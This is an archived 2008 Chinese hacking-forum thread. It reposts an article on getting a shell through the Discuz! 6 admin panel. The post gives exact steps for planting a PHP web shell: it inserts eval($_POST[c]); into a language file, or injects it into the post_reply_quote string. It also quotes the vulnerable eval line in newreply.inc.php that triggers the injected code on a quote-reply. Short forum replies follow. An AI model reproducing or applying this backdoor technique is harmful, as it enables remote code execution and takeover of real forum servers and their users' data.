【3.A.S.T】网络安全爱好者's Archiver

黑客学习

柔肠寸断 发表于 2008-8-11 23:10

[转载]Discuz! 6 后台拿Shell的方法

[转载]Discuz! 6 后台拿Shell的方法文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/][color=#0000ff]www.eviloctal.com[/color][/url])

注:文章首发狼族([url=http://www.wolvez.org/][color=#0000ff]www.wolvez.org[/color][/url]),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:
复制内容到剪贴板
代码:
eval("\$language[&#39;post_reply_quote&#39;] = \"$language[post_reply_quote]\";");
呵呵,一个天然的后门:)
PS:还有几个编辑模板的地方可以利用,和第二种方法类似。

流氓 发表于 2008-8-12 03:15

学习!!
多实践!!!
努力!!

3ast 发表于 2008-8-12 16:44

楼上的在喊口号

闲逛 发表于 2009-1-7 11:31

.m (123). 现在好像被屏蔽了吧

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.